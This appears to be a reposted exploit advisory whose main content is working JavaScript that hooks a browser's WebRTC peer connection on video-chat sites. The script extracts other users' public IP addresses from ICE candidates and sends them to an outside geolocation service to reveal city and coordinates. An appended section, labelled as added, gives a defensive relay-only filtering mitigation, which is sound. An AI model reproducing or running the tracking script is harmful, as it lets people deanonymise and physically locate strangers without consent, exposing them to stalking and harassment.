P2P Communication Vulnerability (IP-Tracking)

2021.04.01
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: P2P Communication Vulnerability (IP-Tracking)
# Date: 01/04/2021
# Exploit Author: Tobias Marcotto
# Tested on: Kali Linux x64
# Description: Due to the peer-to-peer (P2P) communication vulnerability on videochat websites, it is possible to find out every IP address of every user!!!

*********************************************************************************************************

// BY TOBIAS MARCOTTO

let apiKey = "API-KEY";

// Keep a reference to the browser's original constructor, then wrap it.
window.oRTCPeerConnection =
  window.oRTCPeerConnection || window.RTCPeerConnection;

window.RTCPeerConnection = function (...args) {
  const pc = new window.oRTCPeerConnection(...args);

  pc.oaddIceCandidate = pc.addIceCandidate;

  pc.addIceCandidate = function (iceCandidate, ...rest) {
    // In a candidate line, field 4 is the connection address and field 7 the candidate type.
    const fields = iceCandidate.candidate.split(" ");

    console.log(iceCandidate.candidate);

    const ip = fields[4];
    if (fields[7] === "srflx") {
      getLocation(ip);
    }
    return pc.oaddIceCandidate(iceCandidate, ...rest);
  };
  return pc;
};

let getLocation = async (ip) => {
  let url = `https://api.ipgeolocation.io/ipgeo?apiKey=${apiKey}&ip=${ip}`;

  await fetch(url).then((response) =>
    response.json().then((json) => {
      const output = `
          ---------------------
          Country: ${json.country_name}
          State: ${json.state_prov}
          City: ${json.city}
          District: ${json.district}
          Lat / Long: (${json.latitude}, ${json.longitude})
          ---------------------
          `;
      console.log(output);
    })
  );
};
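The remote peer only learns a user's public address because server-reflexive (srflx) candidates, and the raddr field of relay candidates, are signalled to it. The following is an added example, not part of the original advisory: a service-side mitigation that forces TURN relaying and forwards only scrubbed relay candidates. The function names, the TURN URL and credentials, and the sample candidate lines are constructed for illustration.

```javascript
// Added example (not from the advisory). Names and sample data are assumptions.

// Client configuration: gather and use TURN relay candidates only.
// The TURN URL and credentials are placeholders.
const RELAY_ONLY_CONFIG = {
  iceServers: [{ urls: "turn:turn.example.invalid:3478", username: "USER", credential: "SECRET" }],
  iceTransportPolicy: "relay",
};

// Parse an ICE candidate attribute (RFC 8839 grammar):
// candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> [raddr <a>] [rport <p>] ...
function parseCandidate(line) {
  const fields = line.trim().replace(/^a=/, "").split(/\s+/);
  if (fields.length < 8 || !fields[0].startsWith("candidate:") || fields[6] !== "typ") {
    return null; // malformed or end-of-candidates marker
  }
  const parsed = { address: fields[4], port: Number(fields[5]), type: fields[7], ext: {} };
  for (let i = 8; i + 1 < fields.length; i += 2) parsed.ext[fields[i]] = fields[i + 1];
  return parsed;
}

// Return the line to forward to the remote peer, or null to drop it.
// host/srflx/prflx candidates carry the user's own addresses and are dropped.
// Relay candidates are kept, but raddr/rport (the client's mapped address) are
// replaced with the "not revealed" values defined in RFC 8839 (0.0.0.0 or ::, port 9).
function sanitizeForPeer(line) {
  const c = parseCandidate(line);
  if (!c || c.type !== "relay") return null;
  const wildcard = c.address.includes(":") ? "::" : "0.0.0.0";
  return line
    .replace(/(\sraddr\s+)\S+/, (_, prefix) => prefix + wildcard)
    .replace(/(\srport\s+)\S+/, (_, prefix) => prefix + "9");
}

// Apply the filter to a batch of candidate lines on the signalling path.
function filterCandidates(lines) {
  return lines.map(sanitizeForPeer).filter((l) => l !== null);
}

// Constructed sample candidates (documentation address ranges).
const SAMPLE = [
  "candidate:1 1 udp 2122260223 192.168.1.10 54321 typ host generation 0",
  "candidate:2 1 udp 1686052607 203.0.113.7 54321 typ srflx raddr 192.168.1.10 rport 54321 generation 0",
  "candidate:3 1 udp 41885439 198.51.100.20 61000 typ relay raddr 203.0.113.7 rport 54321 generation 0",
];
console.log(filterCandidates(SAMPLE));
```

With this filter in the signalling path, the only address a peer receives is the TURN server's relayed address.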



Copyright 2021, cxsecurity.com

 
